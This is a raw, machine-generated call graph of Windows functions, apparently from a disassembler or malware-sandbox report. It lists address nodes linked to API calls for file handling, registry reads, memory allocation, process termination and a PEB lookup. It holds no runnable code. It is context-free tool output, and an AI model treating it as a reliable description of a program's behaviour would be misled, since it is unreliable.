98085 947510 53 API calls 98084->98085 98086 9b71f0 98085->98086 98500 9ad7bc 98086->98500 98088 9b7201 98089 9ad4ce 4 API calls 98088->98089 98090 9b720b 98089->98090 98091 947510 53 API calls 98090->98091 98094 9b7239 98090->98094 98092 9b7229 98091->98092 98554 9b2947 98092->98554 98095 944f39 68 API calls 98094->98095 98095->98096 98096->97889 98098 949c6e 22 API calls 98097->98098 98099 95f012 98098->98099 98100 95fddb 22 API calls 98099->98100 98104 99f0a8 98099->98104 98102 95f02b 98100->98102 98103 95fe0b 22 API calls 98102->98103 98105 95f03c 98103->98105 98144 95f0a4 98104->98144 98657 9b9caa 39 API calls 98104->98657 98106 946246 CloseHandle 98105->98106 98107 95f047 98106->98107 98109 94a961 22 API calls 98107->98109 98108 94b567 39 API calls 98110 99f10a 98108->98110 98111 95f04f 98109->98111 98112 95f0b1 98110->98112 98113 99f112 98110->98113 98115 946246 CloseHandle 98111->98115 98116 95fa5b 3 API calls 98112->98116 98114 94b567 39 API calls 98113->98114 98120 95f0b8 98114->98120 98117 95f056 98115->98117 98116->98120 98118 947510 53 API calls 98117->98118 98119 95f062 98118->98119 98121 946246 CloseHandle 98119->98121 98123 95f0d3 98120->98123 98124 99f127 98120->98124 98122 95f06c 98121->98122 98125 945745 5 API calls 98122->98125 98126 946270 22 API calls 98123->98126 98127 95fe0b 22 API calls 98124->98127 98128 95f07d 98125->98128 98129 95f0db 98126->98129 98130 99f12c 98127->98130 98131 95f085 98128->98131 98132 99f0a0 98128->98132 98638 95f141 98129->98638 98134 99f140 98130->98134 98658 95f866 ReadFile SetFilePointerEx 98130->98658 98139 9453de 27 API calls 98131->98139 98656 946216 CloseHandle ISource 98132->98656 98142 99f144 __fread_nolock 98134->98142 98659 9b0e85 22 API calls ___scrt_fastfail 98134->98659 98136 95f0ea 98136->98142 98653 9462b5 22 API calls 98136->98653 98141 95f093 98139->98141 98652 9453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98141->98652 98144->98108 98144->98112 98145 95f0fe 98148 95f138 98145->98148 98149 946246 CloseHandle 98145->98149 98146 99f069 98655 9accff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98146->98655 98147 95f09a 98147->98144 98147->98146 98148->97889 98151 95f12c 98149->98151 98151->98148 98654 946216 CloseHandle ISource 98151->98654 98152 99f080 98152->98144 98154->97888 98155->97850 98156->97852 98157->97862 98158->97868 98159->97868 98160->97848 98161->97889 98162->97889 98163->97889 98164->97886 98165->97889 98166->97914 98167->97910 98168->97915 98169->97911 98170->97925 98171->97925 98172->97931 98173->97931 98174->97921 98175->97931 98177 946250 98176->98177 98178 94625f 98176->98178 98177->97959 98178->98177 98179 946264 CloseHandle 98178->98179 98179->98177 98181 947525 98180->98181 98197 947522 98180->98197 98182 94752d 98181->98182 98183 94755b 98181->98183 98287 9651c6 26 API calls 98182->98287 98185 9850f6 98183->98185 98188 98500f 98183->98188 98189 94756d 98183->98189 98290 965183 26 API calls 98185->98290 98186 94753d 98193 95fddb 22 API calls 98186->98193 98196 95fe0b 22 API calls 98188->98196 98202 985088 98188->98202 98288 95fb21 51 API calls 98189->98288 98190 98510e 98190->98190 98194 947547 98193->98194 98195 949cb3 22 API calls 98194->98195 98195->98197 98198 985058 98196->98198 98197->97971 98199 95fddb 22 API calls 98198->98199 98200 98507f 98199->98200 98201 949cb3 22 API calls 98200->98201 98201->98202 98289 95fb21 51 API calls 98202->98289 98204 94575c CreateFileW 98203->98204 98205 984035 98203->98205 98206 94577b 98204->98206 98205->98206 98207 98403b CreateFileW 98205->98207 98206->97980 98206->97981 98207->98206 98208 984063 98207->98208 98291 9454c6 98208->98291 98212 9453f3 98211->98212 98225 9453f0 ISource 98211->98225 98213 9454c6 3 API calls 98212->98213 98212->98225 98214 945410 98213->98214 98215 983f4b 98214->98215 98216 94541d 98214->98216 98303 95fa5b 98215->98303 98217 95fe0b 22 API calls 98216->98217 98219 945429 98217->98219 98220 945722 22 API calls 98219->98220 98221 945433 98220->98221 98297 949a40 98221->98297 98224 9454c6 3 API calls 98224->98225 98225->97986 98227 94b578 98226->98227 98228 94b57f 98226->98228 98227->98228 98309 9662d1 39 API calls _strftime 98227->98309 98228->97943 98230 94b5c2 98230->97943 98232 94a961 22 API calls 98231->98232 98233 945275 98232->98233 98234 94a961 22 API calls 98233->98234 98235 94527d 98234->98235 98236 94a961 22 API calls 98235->98236 98237 945285 98236->98237 98238 94a961 22 API calls 98237->98238 98239 94528d 98238->98239 98240 9452c1 98239->98240 98241 983df5 98239->98241 98243 946d25 22 API calls 98240->98243 98242 94a8c7 22 API calls 98241->98242 98245 983dfe 98242->98245 98244 9452cf 98243->98244 98246 9493b2 22 API calls 98244->98246 98247 94a6c3 22 API calls 98245->98247 98248 9452d9 98246->98248 98249 945304 98247->98249 98248->98249 98250 946d25 22 API calls 98248->98250 98251 945349 98249->98251 98252 945325 98249->98252 98257 983e20 98249->98257 98254 9452fa 98250->98254 98310 946d25 98251->98310 98252->98251 98259 944c6d 22 API calls 98252->98259 98256 9493b2 22 API calls 98254->98256 98255 94535a 98258 945370 98255->98258 98264 94a8c7 22 API calls 98255->98264 98256->98249 98261 946b57 22 API calls 98257->98261 98262 945384 98258->98262 98267 94a8c7 22 API calls 98258->98267 98260 945332 98259->98260 98260->98251 98266 946d25 22 API calls 98260->98266 98263 983ee0 98261->98263 98265 94538f 98262->98265 98268 94a8c7 22 API calls 98262->98268 98263->98251 98270 944c6d 22 API calls 98263->98270 98323 9449bd 22 API calls __fread_nolock 98263->98323 98264->98258 98269 94a8c7 22 API calls 98265->98269 98271 94539a 98265->98271 98266->98251 98267->98262 98268->98265 98269->98271 98270->98263 98271->97962 98274 946362 98273->98274 98275 984a51 98273->98275 98325 946373 98274->98325 98335 944a88 22 API calls __fread_nolock 98275->98335 98278 94636e 98278->97968 98278->97970 98279 984a5b 98280 94a8c7 22 API calls 98279->98280 98281 984a67 98279->98281 98280->98281 98282->97988 98283->97991 98284->97990 98285->97987 98286->97987 98287->98186 98288->98186 98289->98185 98290->98190 98296 9454dd 98291->98296 98292 945564 SetFilePointerEx SetFilePointerEx 98294 945530 98292->98294 98293 983f9c SetFilePointerEx 98294->98206 98295 983f8b 98295->98293 98296->98292 98296->98293 98296->98294 98296->98295 98298 949abb 98297->98298 98302 949a4e 98297->98302 98308 95e40f SetFilePointerEx 98298->98308 98299 94543f 98299->98224 98301 949a8c ReadFile 98301->98299 98301->98302 98302->98299 98302->98301 98304 9454c6 3 API calls 98303->98304 98305 95fa79 98304->98305 98306 9454c6 3 API calls 98305->98306 98307 95fa9a 98306->98307 98307->98225 98308->98302 98309->98230 98311 946d34 98310->98311 98312 946d91 98310->98312 98311->98312 98314 946d3f 98311->98314 98313 9493b2 22 API calls 98312->98313 98320 946d62 __fread_nolock 98313->98320 98315 984c9d 98314->98315 98316 946d5a 98314->98316 98317 95fddb 22 API calls 98315->98317 98324 946f34 22 API calls 98316->98324 98319 984ca7 98317->98319 98321 95fe0b 22 API calls 98319->98321 98320->98255 98322 984cda 98321->98322 98323->98263 98324->98320 98326 946382 98325->98326 98332 9463b6 __fread_nolock 98325->98332 98327 984a82 98326->98327 98328 9463a9 98326->98328 98326->98332 98329 95fddb 22 API calls 98327->98329 98336 94a587 98328->98336 98331 984a91 98329->98331 98333 95fe0b 22 API calls 98331->98333 98332->98278 98334 984ac5 __fread_nolock 98333->98334 98335->98279 98337 94a59d 98336->98337 98340 94a598 __fread_nolock 98336->98340 98338 98f80f 98337->98338 98339 95fe0b 22 API calls 98337->98339 98339->98340 98340->98332 98342 9adbdc GetFileAttributesW 98341->98342 98344 9ad4d5 98341->98344 98343 9adbe8 FindFirstFileW 98342->98343 98342->98344 98343->98344 98345 9adbf9 FindClose 98343->98345 98344->97889 98345->98344 98347 947510 53 API calls 98346->98347 98348 9c7f90 98347->98348 98363 9c7fd5 ISource 98348->98363 98384 9c8cd3 98348->98384 98350 9c844f 98425 9c8ee4 60 API calls 98350->98425 98353 9c845e 98354 9c846a 98353->98354 98355 9c828f 98353->98355 98354->98363 98397 9c7e86 98355->98397 98356 947510 53 API calls 98362 9c8049 98356->98362 98361 9c82c8 98412 95fc70 98361->98412 98362->98356 98362->98363 98371 9c8281 98362->98371 98416 9a417d 22 API calls __fread_nolock 98362->98416 98417 9c851d 42 API calls _strftime 98362->98417 98363->98004 98366 9c82e8 98418 9b359c 82 API calls __wsopen_s 98366->98418 98367 9c8302 98419 9463eb 22 API calls 98367->98419 98370 9c82f3 GetCurrentProcess TerminateProcess 98370->98367 98371->98350 98371->98355 98372 9c8311 98420 946a50 22 API calls 98372->98420 98374 9c832a 98383 9c8352 98374->98383 98421 9504f0 22 API calls 98374->98421 98376 9c84c5 98376->98363 98378 9c84d9 FreeLibrary 98376->98378 98377 9c8341 98422 9c8b7b 75 API calls 98377->98422 98378->98363 98383->98376 98423 9504f0 22 API calls 98383->98423 98424 94aceb 23 API calls ISource 98383->98424 98426 9c8b7b 75 API calls 98383->98426 98385 94aec9 22 API calls 98384->98385 98386 9c8cee CharLowerBuffW 98385->98386 98427 9a8e54 98386->98427 98390 94a961 22 API calls 98391 9c8d2a 98390->98391 98392 946d25 22 API calls 98391->98392 98393 9c8d3e 98392->98393 98394 9493b2 22 API calls 98393->98394 98396 9c8d48 _wcslen 98394->98396 98395 9c8e5e _wcslen 98395->98362 98396->98395 98434 9c851d 42 API calls _strftime 98396->98434 98398 9c7eec 98397->98398 98399 9c7ea1 98397->98399 98403 9c9096 98398->98403 98400 95fe0b 22 API calls 98399->98400 98401 9c7ec3 98400->98401 98401->98398 98402 95fddb 22 API calls 98401->98402 98402->98401 98404 9c92ab ISource 98403->98404 98411 9c90ba _strcat _wcslen 98403->98411 98404->98361 98405 94b567 39 API calls 98405->98411 98406 94b6b5 39 API calls 98406->98411 98407 94b38f 39 API calls 98407->98411 98408 947510 53 API calls 98408->98411 98409 96ea0c 21 API calls ___std_exception_copy 98409->98411 98411->98404 98411->98405 98411->98406 98411->98407 98411->98408 98411->98409 98437 9aefae 24 API calls _wcslen 98411->98437 98414 95fc85 98412->98414 98413 95fd1d VirtualAlloc 98415 95fceb 98413->98415 98414->98413 98414->98415 98415->98366 98415->98367 98416->98362 98417->98362 98418->98370 98419->98372 98420->98374 98421->98377 98422->98383 98423->98383 98424->98383 98425->98353 98426->98383 98428 9a8e74 _wcslen 98427->98428 98429 9a8f63 98428->98429 98431 9a8ea9 98428->98431 98433 9a8f68 98428->98433 98429->98390 98429->98396 98431->98429 98435 95ce60 41 API calls 98431->98435 98433->98429 98436 95ce60 41 API calls 98433->98436 98434->98395 98435->98431 98436->98433 98437->98411 98480 946270 98438->98480 98440 949fd2 98486 94a4a1 98440->98486 98442 949fec 98442->98012 98445 98f699 98454 95fddb 22 API calls 98445->98454 98446 94a6c3 22 API calls 98465 949eb5 98446->98465 98447 98f7c4 98498 9a96e2 84 API calls __wsopen_s 98447->98498 98449 94a405 98449->98442 98499 9a96e2 84 API calls __wsopen_s 98449->98499 98450 94a4a1 22 API calls 98450->98465 98453 98f7d2 98455 94a4a1 22 API calls 98453->98455 98456 98f754 98454->98456 98457 98f7e8 98455->98457 98458 95fe0b 22 API calls 98456->98458 98457->98442 98460 94a12c __fread_nolock 98458->98460 98460->98447 98460->98449 98461 94a587 22 API calls 98461->98465 98462 94aec9 22 API calls 98463 94a0db CharUpperBuffW 98462->98463 98494 94a673 22 API calls 98463->98494 98465->98440 98465->98445 98465->98446 98465->98447 98465->98449 98465->98450 98465->98460 98465->98461 98465->98462 98485 944573 41 API calls _wcslen 98465->98485 98495 9448c8 23 API calls 98465->98495 98496 9449bd 22 API calls __fread_nolock 98465->98496 98497 94a673 22 API calls 98465->98497 98467 949c7e 98466->98467 98468 98f545 98466->98468 98473 95fddb 22 API calls 98467->98473 98469 98f556 98468->98469 98470 946b57 22 API calls 98468->98470 98471 94a6c3 22 API calls 98469->98471 98470->98469 98472 98f560 98471->98472 98472->98472 98474 949c91 98473->98474 98475 949cac 98474->98475 98476 949c9a 98474->98476 98477 94a961 22 API calls 98475->98477 98478 949cb3 22 API calls 98476->98478 98479 949ca2 98477->98479 98478->98479 98479->98016 98481 95fe0b 22 API calls 98480->98481 98482 946295 98481->98482 98483 95fddb 22 API calls 98482->98483 98484 9462a3 98483->98484 98484->98465 98485->98465 98487 94a52b 98486->98487 98493 94a4b1 __fread_nolock 98486->98493 98489 95fe0b 22 API calls 98487->98489 98488 95fddb 22 API calls 98490 94a4b8 98488->98490 98489->98493 98491 94a4d6 98490->98491 98492 95fddb 22 API calls 98490->98492 98491->98442 98492->98491 98493->98488 98494->98465 98495->98465 98496->98465 98497->98465 98498->98453 98499->98442 98501 9ad7d8 98500->98501 98502 9ad7dd 98501->98502 98503 9ad7f3 98501->98503 98505 94a8c7 22 API calls 98502->98505 98553 9ad7ee 98502->98553 98504 94a961 22 API calls 98503->98504 98506 9ad7fb 98504->98506 98505->98553 98507 94a961 22 API calls 98506->98507 98508 9ad803 98507->98508 98509 94a961 22 API calls 98508->98509 98510 9ad80e 98509->98510 98511 94a961 22 API calls 98510->98511 98512 9ad816 98511->98512 98513 94a961 22 API calls 98512->98513 98514 9ad81e 98513->98514 98515 94a961 22 API calls 98514->98515 98516 9ad826 98515->98516 98517 94a961 22 API calls 98516->98517 98518 9ad82e 98517->98518 98519 94a961 22 API calls 98518->98519 98520 9ad836 98519->98520 98521 94525f 22 API calls 98520->98521 98522 9ad84d 98521->98522 98523 94525f 22 API calls 98522->98523 98524 9ad866 98523->98524 98525 944c6d 22 API calls 98524->98525 98526 9ad872 98525->98526 98527 9ad885 98526->98527 98528 9493b2 22 API calls 98526->98528 98529 944c6d 22 API calls 98527->98529 98528->98527 98530 9ad88e 98529->98530 98531 9ad89e 98530->98531 98532 9493b2 22 API calls 98530->98532 98533 9ad8b0 98531->98533 98534 94a8c7 22 API calls 98531->98534 98532->98531 98535 946350 22 API calls 98533->98535 98534->98533 98536 9ad8bb 98535->98536 98620 9ad978 22 API calls 98536->98620 98538 9ad8ca 98621 9ad978 22 API calls 98538->98621 98540 9ad8dd 98541 944c6d 22 API calls 98540->98541 98542 9ad8e7 98541->98542 98543 9ad8fe 98542->98543 98544 9ad8ec 98542->98544 98546 944c6d 22 API calls 98543->98546 98545 9433c6 22 API calls 98544->98545 98547 9ad8f9 98545->98547 98548 9ad907 98546->98548 98552 946350 22 API calls 98547->98552 98549 9ad925 98548->98549 98551 9433c6 22 API calls 98548->98551 98550 946350 22 API calls 98549->98550 98550->98553 98551->98547 98552->98549 98553->98088 98555 9b2954 __wsopen_s 98554->98555 98556 95fe0b 22 API calls 98555->98556 98557 9b2971 98556->98557 98558 945722 22 API calls 98557->98558 98559 9b297b 98558->98559 98560 9b274e 27 API calls 98559->98560 98561 9b2986 98560->98561 98562 94511f 64 API calls 98561->98562 98563 9b299b 98562->98563 98564 9b29bf 98563->98564 98565 9b2a6c 98563->98565 98566 9b2e66 75 API calls 98564->98566 98567 9b2e66 75 API calls 98565->98567 98568 9b29c4 98566->98568 98582 9b2a38 98567->98582 98575 9b2a75 ISource 98568->98575 98626 96d583 26 API calls 98568->98626 98570 9450f5 40 API calls 98571 9b2a91 98570->98571 98572 9450f5 40 API calls 98571->98572 98574 9b2aa1 98572->98574 98573 9b29ed 98627 96d583 26 API calls 98573->98627 98576 9450f5 40 API calls 98574->98576 98575->98094 98578 9b2abc 98576->98578 98579 9450f5 40 API calls 98578->98579 98580 9b2acc 98579->98580 98581 9450f5 40 API calls 98580->98581 98583 9b2ae7 98581->98583 98582->98570 98582->98575 98584 9450f5 40 API calls 98583->98584 98585 9b2af7 98584->98585 98586 9450f5 40 API calls 98585->98586 98587 9b2b07 98586->98587 98588 9450f5 40 API calls 98587->98588 98589 9b2b17 98588->98589 98622 9b3017 GetTempPathW GetTempFileNameW 98589->98622 98591 9b2b22 98592 96e5eb 29 API calls 98591->98592 98604 9b2b33 98592->98604 98593 96e678 67 API calls 98594 9b2bf8 98593->98594 98596 9b2bfe DeleteFileW 98594->98596 98597 9b2c12 98594->98597 98595 9450f5 40 API calls 98595->98604 98596->98575 98598 9b2c18 98597->98598 98599 9b2c91 CopyFileW 98597->98599 98606 9b22ce 79 API calls 98598->98606 98600 9b2cb9 DeleteFileW 98599->98600 98601 9b2ca7 DeleteFileW 98599->98601 98623 9b2fd8 CreateFileW 98600->98623 98601->98575 98603 96dbb3 65 API calls 98603->98604 98604->98575 98604->98595 98604->98603 98605 9b2bed 98604->98605 98605->98593 98607 9b2c7c 98606->98607 98607->98600 98608 9b2c80 DeleteFileW 98607->98608 98608->98575 98610 9830bb 98609->98610 98611 9433dd 98609->98611 98613 95fddb 22 API calls 98610->98613 98628 9433ee 98611->98628 98615 9830c5 _wcslen 98613->98615 98614 9433e8 98614->98047 98616 95fe0b 22 API calls 98615->98616 98617 9830fe __fread_nolock 98616->98617 98618->98056 98619->98069 98620->98538 98621->98540 98622->98591 98624 9b2fff SetFileTime CloseHandle 98623->98624 98625 9b3013 98623->98625 98624->98625 98625->98575 98626->98573 98627->98582 98629 9433fe _wcslen 98628->98629 98630 98311d 98629->98630 98631 943411 98629->98631 98633 95fddb 22 API calls 98630->98633 98632 94a587 22 API calls 98631->98632 98634 94341e __fread_nolock 98632->98634 98635 983127 98633->98635 98634->98614 98636 95fe0b 22 API calls 98635->98636 98637 983157 __fread_nolock 98636->98637 98639 95f14c 98638->98639 98640 95f188 98638->98640 98639->98640 98642 95f15b 98639->98642 98641 94a6c3 22 API calls 98640->98641 98648 9acaeb 98641->98648 98644 95f170 98642->98644 98646 95f17d 98642->98646 98643 9acb1a 98643->98136 98660 95f18e 98644->98660 98667 9acbf2 26 API calls 98646->98667 98648->98643 98668 9aca89 ReadFile SetFilePointerEx 98648->98668 98669 9449bd 22 API calls __fread_nolock 98648->98669 98649 95f179 98649->98136 98652->98147 98653->98145 98654->98148 98655->98152 98656->98104 98657->98104 98658->98134 98659->98142 98670 95f1d8 98660->98670 98666 95f1c1 98666->98649 98667->98649 98668->98648 98669->98648 98671 95fe0b 22 API calls 98670->98671 98672 95f1ef 98671->98672 98673 95fddb 22 API calls 98672->98673 98674 95f1a6 98673->98674 98675 9497b6 98674->98675 98682 949a1e 98675->98682 98677 9497fc 98677->98666 98681 946e14 24 API calls 98677->98681 98678 949a40 2 API calls 98679 9497c7 98678->98679 98679->98677 98679->98678 98689 949b01 22 API calls __fread_nolock 98679->98689 98681->98666 98683 98f378 98682->98683 98684 949a2f 98682->98684 98685 95fddb 22 API calls 98683->98685 98684->98679 98686 98f382 98685->98686 98687 95fe0b 22 API calls 98686->98687 98688 98f397 98687->98688 98689->98679 98690 941098 98695 9442de 98690->98695 98694 9410a7 98696 94a961 22 API calls 98695->98696 98697 9442f5 GetVersionExW 98696->98697 98698 946b57 22 API calls 98697->98698 98701 944342 98698->98701 98699 9493b2 22 API calls 98700 94436c 98699->98700 98703 9437a0 22 API calls 98700->98703 98701->98699 98711 944378 98701->98711 98702 94441b GetCurrentProcess IsWow64Process 98704 944437 98702->98704 98703->98711 98705 94444f LoadLibraryA 98704->98705 98706 983824 GetSystemInfo 98704->98706 98707 944460 GetProcAddress 98705->98707 98708 94449c GetSystemInfo 98705->98708 98707->98708 98709 944470 GetNativeSystemInfo 98707->98709 98710 944476 98708->98710 98709->98710 98713 94109d 98710->98713 98714 94447a FreeLibrary 98710->98714 98711->98702 98712 9837df 98711->98712 98715 9600a3 29 API calls __onexit 98713->98715 98714->98713 98715->98694 98716 1bc2410 98730 1bc0000 98716->98730 98718 1bc24bf 98733 1bc2300 98718->98733 98736 1bc34f0 GetPEB 98730->98736 98732 1bc068b 98732->98718 98734 1bc2309 Sleep 98733->98734 98735 1bc2317 98734->98735 98737 1bc351a 98736->98737 98737->98732 98738 9790fa 98739 979107 98738->98739 98743 97911f 98738->98743 98788 96f2d9 20 API calls __dosmaperr 98739->98788 98741 97910c 98789 9727ec 26 API calls __fread_nolock 98741->98789 98744 97917a 98743->98744 98750 979117 98743->98750 98790 97fdc4 21 API calls 2 library calls 98743->98790 98746 96d955 __fread_nolock 26 API calls 98744->98746 98747 979192 98746->98747 98758 978c32 98747->98758 98749 979199 98749->98750 98751 96d955 __fread_nolock 26 API calls 98749->98751 98752 9791c5 98751->98752 98752->98750 98753 96d955 __fread_nolock 26 API calls 98752->98753 98754 9791d3 98753->98754 98754->98750 98755 96d955 __fread_nolock 26 API calls 98754->98755 98756 9791e3 98755->98756 98757 96d955 __fread_nolock 26 API calls 98756->98757 98757->98750 98759 978c3e __FrameHandler3::FrameUnwindToState 98758->98759 98760 978c46 98759->98760 98761 978c5e 98759->98761 98792 96f2c6 20 API calls __dosmaperr 98760->98792 98762 978d24 98761->98762 98767 978c97 98761->98767 98799 96f2c6 20 API calls __dosmaperr 98762->98799 98765 978c4b 98793 96f2d9 20 API calls __dosmaperr 98765->98793 98769 978ca6 98767->98769 98770 978cbb 98767->98770 98768 978d29 98800 96f2d9 20 API calls __dosmaperr 98768->98800 98794 96f2c6 20 API calls __dosmaperr 98769->98794 98791 975147 EnterCriticalSection 98770->98791 98774 978cb3 98801 9727ec 26 API calls __fread_nolock 98774->98801 98775 978cab 98795 96f2d9 20 API calls __dosmaperr 98775->98795 98776 978cc1 98779 978cf2 98776->98779 98780 978cdd 98776->98780 98777 978c53 __fread_nolock 98777->98749 98782 978d45 __fread_nolock 38 API calls 98779->98782 98796 96f2d9 20 API calls __dosmaperr 98780->98796 98785 978ced 98782->98785 98784 978ce2 98797 96f2c6 20 API calls __dosmaperr 98784->98797 98798 978d1c LeaveCriticalSection __wsopen_s 98785->98798 98788->98741 98789->98750 98790->98744 98791->98776 98792->98765 98793->98777 98794->98775 98795->98774 98796->98784 98797->98785 98798->98777 98799->98768 98800->98774 98801->98777 98802 9603fb 98803 960407 __FrameHandler3::FrameUnwindToState 98802->98803 98831 95feb1 98803->98831 98805 96040e 98806 960561 98805->98806 98809 960438 98805->98809 98858 96083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98806->98858 98808 960568 98859 964e52 28 API calls _abort 98808->98859 98820 960477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98809->98820 98842 97247d 98809->98842 98811 96056e 98860 964e04 28 API calls _abort 98811->98860 98814 960576 98815 960457 98818 9604d8 98850 960959 98818->98850 98820->98818 98854 964e1a 38 API calls 3 library calls 98820->98854 98822 9604de 98823 9604f3 98822->98823 98855 960992 GetModuleHandleW 98823->98855 98825 9604fa 98825->98808 98826 9604fe 98825->98826 98827 960507 98826->98827 98856 964df5 28 API calls _abort 98826->98856 98857 960040 13 API calls 2 library calls 98827->98857 98830 96050f 98830->98815 98832 95feba 98831->98832 98861 960698 IsProcessorFeaturePresent 98832->98861 98834 95fec6 98862 962c94 10 API calls 3 library calls 98834->98862 98836 95fecb 98841 95fecf 98836->98841 98863 972317 98836->98863 98839 95fee6 98839->98805 98841->98805 98844 972494 98842->98844 98843 960a8c CatchGuardHandler 5 API calls 98845 960451 98843->98845 98844->98843 98845->98815 98846 972421 98845->98846 98847 972450 98846->98847 98848 960a8c CatchGuardHandler 5 API calls 98847->98848 98849 972479 98848->98849 98849->98820 98922 962340 98850->98922 98852 96096c GetStartupInfoW 98853 96097f 98852->98853 98853->98822 98854->98818 98855->98825 98856->98827 98857->98830 98858->98808 98859->98811 98860->98814 98861->98834 98862->98836 98867 97d1f6 98863->98867 98866 962cbd 8 API calls 3 library calls 98866->98841 98870 97d213 98867->98870 98871 97d20f 98867->98871 98869 95fed8 98869->98839 98869->98866 98870->98871 98873 974bfb 98870->98873 98885 960a8c 98871->98885 98874 974c07 __FrameHandler3::FrameUnwindToState 98873->98874 98892 972f5e EnterCriticalSection 98874->98892 98876 974c0e 98893 9750af 98876->98893 98878 974c1d 98879 974c2c 98878->98879 98906 974a8f 29 API calls 98878->98906 98908 974c48 LeaveCriticalSection _abort 98879->98908 98882 974c3d __fread_nolock 98882->98870 98883 974c27 98907 974b45 GetStdHandle GetFileType 98883->98907 98886 960a97 IsProcessorFeaturePresent 98885->98886 98887 960a95 98885->98887 98889 960c5d 98886->98889 98887->98869 98921 960c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98889->98921 98891 960d40 98891->98869 98892->98876 98894 9750bb __FrameHandler3::FrameUnwindToState 98893->98894 98895 9750df 98894->98895 98896 9750c8 98894->98896 98909 972f5e EnterCriticalSection 98895->98909 98917 96f2d9 20 API calls __dosmaperr 98896->98917 98899 9750cd 98918 9727ec 26 API calls __fread_nolock 98899->98918 98900 9750eb 98905 975117 98900->98905 98910 975000 98900->98910 98903 9750d7 __fread_nolock 98903->98878 98919 97513e LeaveCriticalSection _abort 98905->98919 98906->98883 98907->98879 98908->98882 98909->98900 98911 974c7d __FrameHandler3::FrameUnwindToState 20 API calls 98910->98911 98913 975012 98911->98913 98912 97501f 98914 9729c8 _free 20 API calls 98912->98914 98913->98912 98920 973405 11 API calls 2 library calls 98913->98920 98916 975071 98914->98916 98916->98900 98917->98899 98918->98903 98919->98903 98920->98913 98921->98891 98922->98852 98923 94105b 98928 94344d 98923->98928 98925 94106a 98959 9600a3 29 API calls __onexit 98925->98959 98927 941074 98929 94345d __wsopen_s 98928->98929 98930 94a961 22 API calls 98929->98930 98931 943513 98930->98931 98932 943a5a 24 API calls 98931->98932 98933 94351c 98932->98933 98960 943357 98933->98960 98936 9433c6 22 API calls 98937 943535 98936->98937 98938 94515f 22 API calls 98937->98938 98939 943544 98938->98939 98940 94a961 22 API calls 98939->98940 98941 94354d 98940->98941 98942 94a6c3 22 API calls 98941->98942 98943 943556 RegOpenKeyExW 98942->98943 98944 983176 RegQueryValueExW 98943->98944 98948 943578 98943->98948 98945 98320c RegCloseKey 98944->98945 98946 983193 98944->98946 98945->98948 98956 98321e _wcslen 98945->98956 98947 95fe0b 22 API calls 98946->98947 98949 9831ac 98947->98949 98948->98925 98950 945722 22 API calls 98949->98950 98951 9831b7 RegQueryValueExW 98950->98951 98953 9831d4 98951->98953 98955 9831ee ISource 98951->98955 98952 944c6d 22 API calls 98952->98956 98954 946b57 22 API calls 98953->98954 98954->98955 98955->98945 98956->98948 98956->98952 98957 949cb3 22 API calls 98956->98957 98958 94515f 22 API calls 98956->98958 98957->98956 98958->98956 98959->98927 98961 981f50 __wsopen_s 98960->98961 98962 943364 GetFullPathNameW 98961->98962 98963 943386 98962->98963 98964 946b57 22 API calls 98963->98964 98965 9433a4 98964->98965 98965->98936 98966 941044 98971 9410f3 98966->98971 98968 94104a 99007 9600a3 29 API calls __onexit 98968->99007 98970 941054 99008 941398 98971->99008 98975 94116a 98976 94a961 22 API calls 98975->98976 98977 941174 98976->98977 98978 94a961 22 API calls 98977->98978 98979 94117e 98978->98979 98980 94a961 22 API calls 98979->98980 98981 941188 98980->98981 98982 94a961 22 API calls 98981->98982 98983 9411c6 98982->98983 98984 94a961 22 API calls 98983->98984 98985 941292 98984->98985 99018 94171c 98985->99018 98989 9412c4 98990 94a961 22 API calls 98989->98990 98991 9412ce 98990->98991 98992 951940 9 API calls 98991->98992 98993 9412f9 98992->98993 99039 941aab 98993->99039 98995 941315 98996 941325 GetStdHandle 98995->98996 98997 982485 98996->98997 98998 94137a 98996->98998 98997->98998 98999 98248e 98997->98999 99001 941387 OleInitialize 98998->99001 99000 95fddb 22 API calls 98999->99000 99002 982495 99000->99002 99001->98968 99046 9b011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99002->99046 99004 98249e 99047 9b0944 CreateThread 99004->99047 99006 9824aa CloseHandle 99006->98998 99007->98970 99048 9413f1 99008->99048 99011 9413f1 22 API calls 99012 9413d0 99011->99012 99013 94a961 22 API calls 99012->99013 99014 9413dc 99013->99014 99015 946b57 22 API calls 99014->99015 99016 941129 99015->99016 99017 941bc3 6 API calls 99016->99017 99017->98975 99019 94a961 22 API calls 99018->99019 99020 94172c 99019->99020 99021 94a961 22 API calls 99020->99021 99022 941734 99021->99022 99023 94a961 22 API calls 99022->99023 99024 94174f 99023->99024 99025 95fddb 22 API calls 99024->99025 99026 94129c 99025->99026 99027 941b4a 99026->99027 99028 941b58 99027->99028 99029 94a961 22 API calls 99028->99029 99030 941b63 99029->99030 99031 94a961 22 API calls 99030->99031 99032 941b6e 99031->99032 99033 94a961 22 API calls 99032->99033 99034 941b79 99033->99034 99035 94a961 22 API calls 99034->99035 99036 941b84 99035->99036 99037 95fddb 22 API calls 99036->99037 99038 941b96 RegisterWindowMessageW 99037->99038 99038->98989 99040 98272d 99039->99040 99041 941abb 99039->99041 99055 9b3209 23 API calls 99040->99055 99042 95fddb 22 API calls 99041->99042 99044 941ac3 99042->99044 99044->98995 99045 982738 99046->99004 99047->99006 99056 9b092a 28 API calls 99047->99056 99049 94a961 22 API calls 99048->99049 99050 9413fc 99049->99050 99051 94a961 22 API calls 99050->99051 99052 941404 99051->99052 99053 94a961 22 API calls 99052->99053 99054 9413c6 99053->99054 99054->99011 99055->99045 99057 94dee5 99060 94b710 99057->99060 99061 94b72b 99060->99061 99062 9900f8 99061->99062 99063 990146 99061->99063 99090 94b750 99061->99090 99066 990102 99062->99066 99069 99010f 99062->99069 99062->99090 99102 9c58a2 256 API calls 2 library calls 99063->99102 99100 9c5d33 256 API calls 99066->99100 99086 94ba20 99069->99086 99101 9c61d0 256 API calls 2 library calls 99069->99101 99072 94bbe0 40 API calls 99072->99090 99073 9903d9 99073->99073 99075 95d336 40 API calls 99075->99090 99077 94ba4e 99079 990322 99105 9c5c0c 82 API calls 99079->99105 99086->99077 99106 9b359c 